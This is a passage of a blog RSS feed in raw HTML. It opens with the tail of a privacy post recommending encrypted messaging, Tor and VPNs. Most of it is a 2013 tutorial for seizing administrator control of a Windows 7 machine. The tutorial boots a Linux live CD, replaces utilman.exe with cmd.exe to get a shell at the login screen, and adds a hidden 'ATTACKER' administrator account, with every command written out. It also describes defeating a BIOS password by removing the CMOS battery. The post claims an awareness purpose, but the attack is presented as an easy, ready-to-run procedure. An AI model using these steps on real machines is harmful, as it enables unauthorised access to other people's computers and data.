RedPhone -&amp;gt; encrypted calls.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;Use texting -&amp;gt; metadata and message content collection -&amp;gt;
Use TextSecure to encrypt texts.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;Chat with friends -&amp;gt; messages being eavesdropped -&amp;gt; Use
ChatSecure -&amp;gt; Provides end-to-end encryption, more privacy.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;font-size: small; line-height: 107%;&quot;&gt;Surf the Internet -&amp;gt; Data mining, less privacy
-&amp;gt; Use Tor (anonymizing software) -&amp;gt; More secure.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;Surf in a public shop -&amp;gt; eavesdropping on your communication -&amp;gt; Use VPN -&amp;gt; Encrypted tunnel for your communication.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;b&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;Note:&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;For RedPhone, ChatSecure and
TextSecure to work with end-to-end encryption, both parties (sender and
receiver) must have the same application installed on their smartphones.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;Conclusion&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 107%;&quot;&gt;The point here is not to have 100% privacy and
security, because that is impossible in this digital and physical world.&amp;nbsp; What we must aim for is to have as much privacy as
possible while keeping ourselves out of the stack of potatoes that governments
and entities like Google and Facebook use to watch our everyday habits and use
them for their own good.&amp;nbsp; Being aware is
the first step; now you have to step up and make it a habit.&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>https://unsecuritynow.blogspot.com/2014/07/how-to-better-your-privacy.html</link><author>noreply@blogger.com (UnsecurityNow)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-3117409424963438735</guid><pubDate>Wed, 09 Oct 2013 05:39:00 +0000</pubDate><atom:updated>2013-10-09T08:40:25.564-05:00</atom:updated><title>How Can a 10 Year Old Have Administrator Access to Your Fortified Windows 7 Computer</title><description>&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;Disclaimer:&amp;nbsp; First of all I would like to let you know that I am not to be held responsible for the misuse of the information stated here.&amp;nbsp; This blog is only to let people know about the vulnerabilities, bugs, and security vectors that are out there, since the companies that possess them do not even talk about them, so I bring them to light to make people more aware of this issue.&amp;nbsp; Since the first 10 amendments (the Bill of Rights) give me the right to share information, here it is, because knowledge is power.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&amp;nbsp;Nowadays, someone does not need to know a lot about the security inner workings of the Windows 7 Operating System to take total control of it.&amp;nbsp; This procedure is so simple even a 10 year old can do it, needing ONLY a Linux live CD or DVD (or even a flash drive) that the BIOS can boot from.&amp;nbsp; I like to call this procedure application hijacking, and there is no fix or way to defend against it on the Windows Operating System side. However, the risk can be reduced by putting a password on the BIOS, but even that can be bypassed by taking the CMOS battery out, which resets the BIOS password completely. That bypass will be noticed if the owner of the computer&amp;nbsp; checks the BIOS and realizes there is no password prompt, but by then it might be too late...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;So here it is. First, we can see the Windows login screen is totally normal. This attack relies on the &quot;Ease of Access&quot; button, which helps people with disabilities use the Operating System by providing them with a magnifying glass, on-screen keyboard, voice recognition, etc.&amp;nbsp; As the name states, &quot;Ease of Access&quot; now becomes &quot;Ease of Penetration Access&quot; :)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/-OX2WWQqFyDA/UlTgWPI9ooI/AAAAAAAAANg/26BsdUCppBA/s1600/1.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;384&quot; src=&quot;http://4.bp.blogspot.com/-OX2WWQqFyDA/UlTgWPI9ooI/AAAAAAAAANg/26BsdUCppBA/s640/1.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;/span&gt;

&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/-Kt4SKzV_qkw/UlTjw-GJf2I/AAAAAAAAAQo/N9Qox5q6zLA/s1600/2.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;380&quot; src=&quot;http://4.bp.blogspot.com/-Kt4SKzV_qkw/UlTjw-GJf2I/AAAAAAAAAQo/N9Qox5q6zLA/s640/2.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;With this said, we will try booting from the BIOS, but first we need to configure it so it boots from the CD-ROM, DVD-ROM or flash drive (whichever you prefer).&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/-qwtn94aAcv4/UlTjxrEA4KI/AAAAAAAAAQw/y39l7agQp5M/s1600/4.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;472&quot; src=&quot;http://4.bp.blogspot.com/-qwtn94aAcv4/UlTjxrEA4KI/AAAAAAAAAQw/y39l7agQp5M/s640/4.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/-x0YFpqc6JpU/UlTjyFciAzI/AAAAAAAAARA/-LC6WbWGJpU/s1600/5.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;470&quot; src=&quot;http://2.bp.blogspot.com/-x0YFpqc6JpU/UlTjyFciAzI/AAAAAAAAARA/-LC6WbWGJpU/s640/5.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;After this, we boot with Linux. For this lab, we will use one of my favourite distros: Kali Linux (aka Backtrack 6).&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/-7-Wf4oXN70k/UlTjydhikdI/AAAAAAAAARI/32xfnnGMkjo/s1600/6.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;538&quot; src=&quot;http://2.bp.blogspot.com/-7-Wf4oXN70k/UlTjydhikdI/AAAAAAAAARI/32xfnnGMkjo/s640/6.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;We wait until all files, hardware, kernel and services are loaded and we will be presented with the desktop. You can try it with the CLI or the GUI. It really does not matter as long as you use the proper commands:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/-8Yrj80jfs8s/UlTjzNNnr6I/AAAAAAAAARU/OOBeCwfLGOE/s1600/7.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;454&quot; src=&quot;http://4.bp.blogspot.com/-8Yrj80jfs8s/UlTjzNNnr6I/AAAAAAAAARU/OOBeCwfLGOE/s640/7.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;First we create a directory where we will mount the physical hard drive (where Windows 7 resides).&amp;nbsp; Note that /dev/sda# will be your hard drive if you are using a SATA drive and /dev/hda# if you are using an IDE hard drive.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#mkdir /media/harddrive&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#mount /dev/sda1 /media/harddrive/&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Now we will proceed to the hijacking process, but first we will make a backup of the &quot;ease of access&quot; file, which is called &quot;utilman.exe&quot;.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#cd /media/harddrive/&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#cd Windows/&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#cd System32/&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;# mv Utilman.exe Utilman.Backup.exe&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Now let&#39;s do the hijacking process with cmd.exe :)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#cp cmd.exe Utilman.exe&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Reboot the system:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;#reboot &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/-RZ_lNTizqN8/UlTrqPzboqI/AAAAAAAAARs/MVa-z4mDJfY/s1600/8a.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;428&quot; src=&quot;http://2.bp.blogspot.com/-RZ_lNTizqN8/UlTrqPzboqI/AAAAAAAAARs/MVa-z4mDJfY/s640/8a.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Now it is time to reboot the system, take out the CD, DVD or flash drive, change the BIOS back to normal and let Windows start.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/-6a4WTtwI6Kk/UlTjzHME6hI/AAAAAAAAARc/gNIGKJftHSc/s1600/8.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;488&quot; src=&quot;http://1.bp.blogspot.com/-6a4WTtwI6Kk/UlTjzHME6hI/AAAAAAAAARc/gNIGKJftHSc/s640/8.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/-WmCYEHmmgjw/UlTjzemYAUI/AAAAAAAAARg/lOZfrbwDB0U/s1600/9.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;382&quot; src=&quot;http://2.bp.blogspot.com/-WmCYEHmmgjw/UlTjzemYAUI/AAAAAAAAARg/lOZfrbwDB0U/s640/9.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;After Windows starts, let&#39;s click once more on the &quot;Ease of (Penetration) Access&quot; button and &quot;Voila!!&quot;, the CMD.exe window with ADMINISTRATOR privileges appears :) &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://2.bp.blogspot.com/-jKx_CJzKuwo/UlTjsDDQN2I/AAAAAAAAAP4/6ljnl51lKfg/s1600/10.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;380&quot; src=&quot;http://2.bp.blogspot.com/-jKx_CJzKuwo/UlTjsDDQN2I/AAAAAAAAAP4/6ljnl51lKfg/s640/10.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Now, let&#39;s give ourselves Administrator Access with the username &quot;Attacker&quot;:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;NET USER ATTACKER /ADD&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;NET LOCALGROUP ADMINISTRATORS ATTACKER /ADD&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Let&#39;s verify the user attacker is an administrator:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;NET USER ATTACKER&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;You can also verify by seeing who is in our Administrators group:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;NET LOCALGROUP ADMINISTRATORS&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;EXIT&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://3.bp.blogspot.com/-yuQPKP0nGOU/UlTjrhzHP0I/AAAAAAAAAPo/Tb7cxomNWjQ/s1600/11.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;550&quot; src=&quot;http://3.bp.blogspot.com/-yuQPKP0nGOU/UlTjrhzHP0I/AAAAAAAAAPo/Tb7cxomNWjQ/s640/11.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/-KxA9lqN7wnE/UlTjsnVdDRI/AAAAAAAAAQA/31gR29bvpIA/s1600/12.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;516&quot; src=&quot;http://4.bp.blogspot.com/-KxA9lqN7wnE/UlTjsnVdDRI/AAAAAAAAAQA/31gR29bvpIA/s640/12.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Now it is time to login with our newly-super-user account:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/-C0G63FO830w/UlTjuRMHchI/AAAAAAAAAQI/z3nz3tcdAoE/s1600/13.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://1.bp.blogspot.com/-C0G63FO830w/UlTjuRMHchI/AAAAAAAAAQI/z3nz3tcdAoE/s640/13.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://1.bp.blogspot.com/-sINZqfzCbXw/UlTjvOVRs8I/AAAAAAAAAQQ/nbK09OK8z7Q/s1600/14.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;402&quot; src=&quot;http://1.bp.blogspot.com/-sINZqfzCbXw/UlTjvOVRs8I/AAAAAAAAAQQ/nbK09OK8z7Q/s640/14.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;Let&#39;s verify that the account we just logged in with has administrator rights:&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/--dVeQkvq8SM/UlTjv9RUgSI/AAAAAAAAAQc/vi4ZsnjVWVs/s1600/15.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;404&quot; src=&quot;http://4.bp.blogspot.com/--dVeQkvq8SM/UlTjv9RUgSI/AAAAAAAAAQc/vi4ZsnjVWVs/s640/15.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://4.bp.blogspot.com/-tewJj3m57_c/UlTjwANSEOI/AAAAAAAAAQg/HBpQzy2jo2Y/s1600/16.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;406&quot; src=&quot;http://4.bp.blogspot.com/-tewJj3m57_c/UlTjwANSEOI/AAAAAAAAAQg/HBpQzy2jo2Y/s640/16.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif; font-size: large;&quot;&gt;&lt;/span&gt;
